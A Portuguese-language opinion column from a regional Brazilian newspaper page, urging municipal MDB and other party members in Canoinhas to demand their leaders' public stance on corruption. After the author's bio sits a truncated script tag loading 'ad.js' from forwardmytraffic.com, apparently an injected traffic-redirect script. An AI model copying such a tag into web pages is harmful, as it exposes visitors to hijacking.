InícioLivrePosicionamento Municipal

Posicionamento Municipal

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio estimado em R$ 3,5 milhões

As seis dezenas do concurso 2.716 da Mega-Sena serão...

Pedidos de isenção da taxa do Enem podem ser feitos até sexta-feira

Termina na próxima sexta-feira (26) o prazo para pedir...

Entenda o Programa Acredita, que pretende ampliar acesso ao crédito

Com o potencial de destravar até R$ 30 bilhões...

A política nasce aqui no município assim como todos os brasileiros nascem em municípios. A escala da política preferencialmente deve ser do município ao estado para depois ascender ao governo federal. É a lógica. Mas somos um povo lógico? Não somos. Vejam como funciona a política por aqui: os diretórios municipais seguem as orientações do diretório estadual que, por sua vez, obedece aos ditames dos caciques de Brasília. Só pode ser isso porque nos municípios os MDBistas se dizem contra a corrupção mas, quantos fazem isso de forma irrevogável?  Quantos diretórios municipais pediram celeridade nas investigações contra Temer?

 

 

Essa cobrança vale para os outros filiados em partidos enlameados pelas acusações de corrupção. Eu mesmo pedi desfiliação do PSDB quando o diretório municipal e estadual se quedaram inertes sobre o apoio ao governo Temer e as denúncias contra Aécio. A política se faz aqui! Aqui em Canoinhas e nos outros tantos municípios brasileiros. A meu ver só permanecem mudos os que desejam se beneficiar da política de maneira direta. Precisamos saber a opinião de todos os nossos representantes em todas as esferas e para sabermos suas opiniões precisamos que escrevam, publiquem ou postem em suas redes sociais. Chega desse medo, dessa água morna!

 

 

Um dia o vereador se torna prefeito ou deputado. Por isso desde sempre precisamos saber o que leem e o que pensam. Quer sejam de esquerda ou de direita esses caras estão lendo alguma coisa (quero crer que estão) e estão pensando alguma coisa. Eu não me surpreenderia se pensassem exatamente o oposto do que está no programa do partido! Eu não me surpreenderia se NÃO pensassem em nada (a não ser em permanecerem na política).

 

 

Por que falo em pensamento? Porque logo mais acontecerá em Canoinhas uma reunião do MDB. É nessa reunião que os filiados podem cobrar o posicionamento de seus líderes. Líder que não se posiciona é fraco. Líder que não pressiona o partido para conseguir melhorar o país não merece liderar. Pois então que mostrem como pensam, como apresentam seu posicionamento para acima e abaixo na hierarquia do partido. Porque como disse James C. Hunter:

 

Pensamentos viram ações
Ações viram hábitos
Hábitos viram o caráter
E o caráter vira o seu destino.

Antônio Vasco é médico veterinário e acadêmico de Direito na UnC Canoinhas

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.